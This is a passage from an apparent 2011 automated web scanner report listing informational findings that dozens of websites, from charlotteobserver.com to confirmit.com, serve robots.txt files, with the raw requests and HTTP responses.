Set-Cookie: sessionId=NjIyOWUyM2MtOTUxYy00YjliLTkxNjQtOTQ5OGM1ZGM3Zjk1o6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Set-Cookie: wuid=M2Y3YzFjMjItMmI3My00NTEwLWE0MjYtZWYxMTRkYzVkNWY4o6b4; Expires=Sun, 01-Apr-2012 12:43:29 GMT; Path=/
Set-Cookie: seenUser=dHJ1ZQ%3D%3Do6b4; Expires=Fri, 01-Jul-2011 12:43:29 GMT; Path=/
Set-Cookie: sessionId=OGUzZGVhMGQtYTczMi00NmQ4LTkyMTEtOTQ4YTJlOGUwODQ4o6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Content-disposition: inline
Content-Type: text/plain;charset=UTF-8
Content-Language: en-US
Content-Length: 470
Date: Sat, 02 Apr 2011 12:43:28 GMT
Connection: close

Sitemap: http://www.chacha.com/sitemap.xml.gz

User-agent: *
Disallow: /flagAbusiveQuestion/
Disallow: /flagFunnyQuestion/
Disallow: /account/
Disallow: /addQuestionComment
Disallow: /addTopicC
...[SNIP]...

24.165. http://www.charlotteobserver.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Mon, 12 Jul 2010 21:15:00 GMT
ETag: "192f210-89-4c3b85d4"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:58:32 GMT
Content-Length: 137
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.charlotteobserver.com/sitemap.xml
Sitemap: http://www.charlotteobserver.com/news_sitemap.xml

24.166. http://www.cheapoair.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapoair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheapoair.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 08 Oct 2010 20:22:52 GMT
Accept-Ranges: bytes
ETag: "4f306b952667cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:25 GMT
Connection: keep-alive
Content-Length: 405

User-agent: InternetSeer.com
Disallow: /
User-agent: *
Disallow: /default.aspx?tabid=3222
Disallow: /default.aspx?tabid=1688*
Disallow: /default.aspx?tabid=4298*
Disallow: /default.aspx?tabid=16
...[SNIP]...

24.167. http://www.chemistry.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chemistry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chemistry.com

Response

HTTP/1.1 200 OK
Content-Length: 122
Content-Type: text/plain
Last-Modified: Wed, 23 Feb 2011 15:22:28 GMT
Accept-Ranges: bytes
ETag: "dc8927b6dd3cb1:53b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:53 GMT
Connection: keep-alive

User-agent: *
Disallow: /tools
Disallow: /api
Disallow: /redalert
Disallow: /keynote
Disallow: /bin
Disallow: /sites

24.168. http://www.chevrolet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chevrolet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chevrolet.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: W/"482-1278690994000"
Last-Modified: Fri, 09 Jul 2010 15:56:34 GMT
X-Pillar-Name: VAPROD
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:50:53 GMT
Content-Length: 482
Connection: close

User-agent: *
Disallow:/mds/css/
Disallow:/mds/js/
Disallow:/en/css/
Disallow:/en/js/
Disallow:/xml/
Disallow:/services/
Disallow:/messaging/
Disallow:/tools/byo/
Disallow:/tools/comparator/
...[SNIP]...

24.169. http://www.chicagotribune.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chicagotribune.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chicagotribune.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 363
Content-Type: text/plain
P3P: policyref="http://www.chicagotribune.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 17 Dec 2009 03:50:28 GMT
ETag: "16b-4b29aa84"
Cache-Control: private, max-age=125
Date: Sat, 02 Apr 2011 13:32:26 GMT
Content-Length: 363
Connection: close

User-agent: *
Disallow: *,email.*
Disallow: /search/
Disallow: /about/site/music
Disallow: /about/site/healthtesthomepage
Disallow: /about/site/healthtestfitness
Disallow: /about/site/temp
Disallow: /
...[SNIP]...

24.170. http://www.chilisemailclub.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chilisemailclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chilisemailclub.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:01:03 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 16:31:55 GMT
ETag: "1c6006e-78-49dfb267e34c0"
Accept-Ranges: bytes
Content-Length: 120
Cache-Control: max-age=54000
Expires: Sun, 03 Apr 2011 05:01:03 GMT
Vary: Accept-Encoding
P3P: CP="CURa ADMa DEVa IVAa IVDa CONa OUR IND DSP NON COR", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8

# Default robots.txt file, start with this and add any custom rules for your properties.
User-agent: *
Disallow: /.svn/

24.171. http://www.choicehotels.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.choicehotels.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.choicehotels.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 16 Mar 2011 17:35:12 GMT
ETag: "112-49e9cf78ad400"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 274
Date: Sat, 02 Apr 2011 13:38:56 GMT
Connection: close

User-agent: AdsBot-Google
Disallow: /download/survey/*

User-agent: *
Crawl-delay: 1
Disallow: /ires/
Disallow: /bestrate/
Disallow: /lpga*
Disallow: /signup/*
Disallow: /shtml/CambriaSuites/
...[SNIP]...

24.172. http://www.chow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chow.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 09 Oct 2009 01:02:01 GMT
ntCoent-Length: 167
Cneonction: close
Content-Type: text/plain
Vary: Host
Cache-Control: private, max-age=86400
Date: Sat, 02 Apr 2011 13:33:05 GMT
Content-Length: 167
Connection: close

User-agent: *
Disallow: /account/
Disallow: /chowpickawards
Disallow: /action/rd
Disallow: /account/signup

Sitemap: http://www.chow.com/sitemap-index-chow.xml

24.173. http://www.christianbook.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.christianbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.christianbook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:13 GMT
Server: Apache/1.3.42 (Unix) mod_perl/1.31
Last-Modified: Tue, 23 Feb 2010 16:55:43 GMT
ETag: "6-1210-4b84088f"
Accept-Ranges: bytes
Content-Length: 4624
Keep-Alive: timeout=120, max=495
Connection: Keep-Alive
Content-Type: text/plain

# Welcome to Christianbook.com
# and thanks for asking about our robot rules

User-agent: Googlebot
Disallow: /apps
Disallow: /apps/*
Disallow: /Christian/Books/wishlist
Disallow: /Christian/Books/wi
...[SNIP]...

24.174. http://www.chron.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chron.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chron.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
Last-Modified: Mon, 17 May 2010 17:10:23 GMT
ETag: "33e-486cd4cdfddc0"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADM DEVa TAIa PSAa PSDa CONo OUR DELo IND PHY ONL INT STA DEM UNI COM NAV"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:34:23 GMT
Content-Length: 830
Connection: close

User-agent: Mediapartners-Google*
Disallow: /edgil/
Disallow: /system/
Disallow: /tmp/
Disallow: /westest/
Disallow: /cgi-bin/AT-HCIsearch.cgi
Disallow: /cs/CDA/openstory.hts
Disallow: /content/intera
...[SNIP]...

24.175. http://www.chuckecheese.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chuckecheese.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chuckecheese.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 11 Jun 2007 19:17:00 GMT
ETag: "578644-88-39a64300"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /email/
Disallow: /flash/
Disallow: /images/
Disallow: /includes/
Disallow: /urchin/


24.176. http://www.cincinnati.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cincinnati.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cincinnati.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:52 GMT
Server: Apache
Last-Modified: Wed, 16 Sep 2009 07:25:01 GMT
ETag: "1081e4c-24-473accc008d40"
Accept-Ranges: bytes
Content-Length: 36
Wx: D=1221 t=1301752252292208 w=4
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /halloween/

24.177. http://www.cisco.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cisco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cisco.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0
Last-Modified: Wed, 30 Jun 2010 14:57:56 GMT
ETag: "9436c500"
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:39:20 GMT
CDCHOST: ccows-sj-203
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:39:20 GMT
Content-Length: 1303
Connection: close
Set-Cookie: CP_GUTC=72.163.4.166.1301751560421948; path=/; expires=Wed, 26-Mar-36 13:39:20 GMT; domain=.cisco.com

#--------------------------------
User-agent: cisco-googlebot-enterprise
Disallow: /bug-navigator # Bug Data
# Disallow: /cgi-bin # allow test crawls for TAC support content
Disallow: /pcgi-bin # no p
...[SNIP]...

24.178. http://www.citibank.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.citibank.com

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:35:26 GMT
Content-length: 124
Content-type: text/plain
Last-modified: Thu, 01 Jul 2010 15:17:05 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Sitemap: http://www.citi.com/domain/infra/citi_sitemap.xml
Disallow: /uae/gcb/pm_google/form.htm
Allow: /

24.179. http://www.city-data.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.city-data.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.city-data.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:12 GMT
Server: Apache
Last-Modified: Fri, 25 Mar 2011 12:33:32 GMT
ETag: "3590cce-2eb-49f4dcd451f00"
Accept-Ranges: bytes
Content-Length: 747
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

User-agent: Mediapartners-Google*
Disallow:


User-agent: *
Disallow: /forum/search.php*
Disallow: /forum/reputation.php*
Disallow: /forum/newreply.php*
Dis
...[SNIP]...

24.180. http://www.citygridmedia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citygridmedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.citygridmedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:12 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
X-Pingback: http://www.citygridmedia.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

24.181. http://www.classesusa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classesusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classesusa.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:13 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1301751193434003; path=/; expires=Mon, 01-Apr-13 13:33:13 GMT
Last-Modified: Wed, 30 Mar 2011 22:50:02 GMT
ETag: "fe807-27-49fbaff409a80"
Accept-Ranges: bytes
Content-Length: 39
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerpl.eduprod=654581770.20480.0000; path=/

User-agent: *
Disallow: /presentations/

24.182. http://www.classifiedads.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classifiedads.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classifiedads.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:43 GMT
Server: Apache
Last-Modified: Thu, 10 Mar 2011 20:28:28 GMT
ETag: "1998021-a5-49e26b024f300"
Accept-Ranges: bytes
Content-Length: 165
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /link.php
Disallow: /linkcpa.php
Disallow: /linkint.php
Disallow: /linkoodle.php
Disallow: /linkindeed.php

Crawl-delay: 3
Request-rate: 1/3

24.183. http://www.classmates.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classmates.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classmates.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:30 GMT
Server: Apache
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CON HIS OTPi OUR DELi SAMi PUBi IND OTC"
Last-Modified: Wed, 23 Feb 2011 19:33:22 GMT
ETag: "ee8-4d656102"
Accept-Ranges: bytes
Content-Length: 3816
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /feature
Disallow: /cmo/caliprivacy.jsp
Disallow: /cmo/cookies.jsp
Disallow: /cmo/fragments
Disallow: /cmo/lost
Disallow: /cmo/partners
Disallow: /cmo/photosweepsrules.jsp
Disa
...[SNIP]...

24.184. http://www.clear.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clear.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clear.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8r
Last-Modified: Tue, 01 Feb 2011 19:20:03 GMT
ETag: "5c805-263-49b3d6b56bec0"
Accept-Ranges: bytes
Content-Length: 611
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robot.txt for www.clear.com
# match all crawlers
User-agent: *
# keep them out of the following
Disallow: /account-usage/
Disallow: /charts/
Disallow: /drivers/
Disallow: /email_html/
Disallow: /inc
...[SNIP]...

24.185. http://www.cmt.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cmt.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Wed, 23 Dec 2009 23:14:57 GMT
ETag: "474acb8-35-47b6d7dad3e40"
Accept-Ranges: bytes
Content-Length: 53
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:38:06 GMT
Connection: close

User-agent: *
Disallow: /search/
Disallow: /inhouse/

24.186. http://www.cnbc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 14:59:21 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/plain
Via: 1.1 C aicache6
Content-Length: 305
X-Aicache-OS: 64.210.194.245:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Sat, 02 Apr 2011 14:59:21 GMT

# robots.txt file for www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.cnbc.com/xml/SitemapIndexCNBC.xml
Sitemap: http://syndication.cnbc.com/sitemaps/sitemap_static.xml
Sitema
...[SNIP]...

24.187. http://www.cnet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:05 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
Content-Length: 3923
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Type: text/plain

"# $Source: /cvs/main/ops/config/global/w/robots.txt,v $"
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /css/
Disallow:
...[SNIP]...

24.188. http://www.cnn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnn.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:16 GMT
Server: Apache
Set-Cookie: CG=US:TX:Dallas; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 12:39:16 GMT
Content-Length: 749
Content-Type: text/plain
Connection: close

Sitemap: http://www.cnn.com/sitemap_index.xml
Sitemap: http://www.cnn.com/sitemap_news.xml
Sitemap: http://www.cnn.com/video_sitemap_index.xml
Sitemap: http://www.cnn.com/sitemap_election_2010.xml
Use
...[SNIP]...

24.189. http://www.cobaltnitra.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cobaltnitra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cobaltnitra.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:36 GMT
Server: Apache/2.2.3 (Oracle) DAV/2 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: click_tracker=10.64.64.6.1301752596424579; path=/; expires=Mon, 01-Apr-13 13:56:36 GMT
Last-Modified: Thu, 09 Aug 2007 21:48:22 GMT
ETag: "1e7efe0-19a-4374b379db580"
Accept-Ranges: bytes
Content-Length: 410
Content-Type: text/plain
Set-Cookie: BIGipServernitra.staticweb=520634378.20480.0000; path=/
X-Cache: MISS from backend02-1
X-Cache-Lookup: MISS from backend02-1:4001
X-Cache: MISS from frontend02
X-Cache-Lookup: MISS from frontend02:3128
Via: 1.0 backend02-1 (squid), 1.0 frontend02 (squid)
Proxy-Connection: close

User-agent: *
Disallow: /en_US/HoursAndDirections.jsp
Disallow: /en_US/DrivingDirections.jsp
Disallow: /es_US/HoursAndDirections.jsp
Disallow: /es_US/DrivingDirections.jsp
Disallow: /en_CA/HoursAndDir
...[SNIP]...

24.190. http://www.colbertnation.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.colbertnation.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Accept-ESI: 1.0
Content-Disposition: inline; filename=robots.txt
Content-Length: 75
Content-Type: text/plain
Cache-Control: max-age=1375
Expires: Sat, 02 Apr 2011 14:42:04 GMT
Date: Sat, 02 Apr 2011 14:19:09 GMT
Connection: close

Sitemap: http://www.colbertnation.com/sitemap.xml
User-agent: *
Disallow:

24.191. http://www.collegeboard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegeboard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:02 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 21:28:07 GMT
ETag: "ce-49b2b177fe7c0"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /apac/2007/
Disallow: /events/apac/2009/
Disallow: /events/apac/2008/
Disallow: /email/
Disallow: /events/apac/2010/
Disallow: /events/apac/2010/homepage/index.
...[SNIP]...

24.192. http://www.collegeconfidential.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeconfidential.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegeconfidential.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Feb 2011 21:48:41 GMT
Accept-Ranges: bytes
Content-Length: 387
Vary: Accept-Encoding
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerims_ccinfo_pool=3298375690.20480.0000; path=/

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

24.193. http://www.collegehumor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegehumor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:39 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 21:10:15 GMT
ETag: "9c078-2c5-49ec8344dbbc0"
Accept-Ranges: bytes
Content-Length: 709
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /etc
Disallow: /_jument/ads
Allow: /
Sitemap: http://www.collegehumor.com/static_sitemap.xml
Sitemap: http://www.collegehumor.com/xml_sitemap/videos.xml
Sitemap: http://www.col
...[SNIP]...

24.194. http://www.columbia.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.columbia.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.columbia.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:15 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 02 Jul 2009 16:02:03 GMT
Accept-Ranges: bytes
Content-Length: 1959
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# for info on robots.txt syntax see
# http://www.searchtools.com/robots/robots-txt.html

User-agent: Ultraseek
Disallow: /~nsn1/
Disallow: /acis/cria/rosenberg/
Disallow: /acis/draft/
Disallow: /acis/
...[SNIP]...

24.195. http://www.comcast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comcast.com

Response

HTTP/1.1 200 OK
Content-Length: 943
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 14:42:26 GMT
Accept-Ranges: bytes
ETag: "cf2211b0e8eecb1:149e"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 12:43:30 GMT
Connection: close
Set-Cookie: BIGipServerpool_comcastcom_VIP1=86896965.20480.0000; path=/


# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /connectyourfreewii
Disallow: /About/PressRelease/PressReleaseDetail.ashx?PRID=305
Disallow: /About/PressRelease/PressR
...[SNIP]...

24.196. http://www.comcast.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 02 Apr 2011 12:37:55 GMT
Cache-Control: max-age=300
Content-Type: text/plain
Content-Length: 394
X-Pad: avoid browser bug
Date: Sat, 02 Apr 2011 12:37:55 GMT
Connection: close

# robots.txt for comcast.net :: akamai version

User-agent: *
Disallow: /user/authkey/
Disallow: */data/*
Disallow: /beta/
Disallow: /mycomcast/
Disallow: /b/
Disallow: /c/
Disallow: /d/
Disallow: /e/
...[SNIP]...

24.197. http://www.comedycentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comedycentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comedycentral.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 490
Content-Type: text/plain
Last-Modified: Tue, 24 Aug 2010 22:02:19 GMT
ETag: "1ea-4c74416b"
Accept-Ranges: bytes
Cache-Control: max-age=1026
Expires: Sat, 02 Apr 2011 13:54:09 GMT
Date: Sat, 02 Apr 2011 13:37:03 GMT
Connection: close

# robots.txt for Disallow: /

Sitemap: http://www.comedycentral.com/sitemap_robots.jhtml

User-agent: *
Disallow: /global
Disallow: /sitewide
Disallow: /search
Disallow: /inhouse
Disallow: /m
...[SNIP]...

24.198. http://www.comfortinn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comfortinn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comfortinn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:10:14 GMT
ETag: "102-49c04c57dc980"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 258
Date: Sat, 02 Apr 2011 14:03:44 GMT
Connection: close

User-agent: AdsBot-Google
Disallow: /download/survey/*

User-agent: *
Crawl-delay: 1
Disallow: /ires/
Disallow: /bestrate/
Disallow: /de/*
Disallow: /ja/
Disallow: /cities/*
Disallow: /hotel
...[SNIP]...

24.199. http://www.complaintsboard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.complaintsboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.complaintsboard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 21:28:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 22 Oct 2010 03:11:34 GMT
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

24.200. http://www.computing.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computing.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.computing.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:43:13 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Wed, 19 May 2010 13:21:14 GMT
ETag: "6d84a69-83-486f2550d8680"
Accept-Ranges: bytes
Content-Length: 131
Vary: Accept-Encoding,User-Agent

User-agent: *
Disallow: /cgi-bin/*
Disallow: /model/
Disallow: /manufacturer/
Sitemap: http://www.computing.net/pushad/sitemap.xml

24.201. http://www.confirmit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.confirmit.com
Path:   /favicon.ico

Issue detail

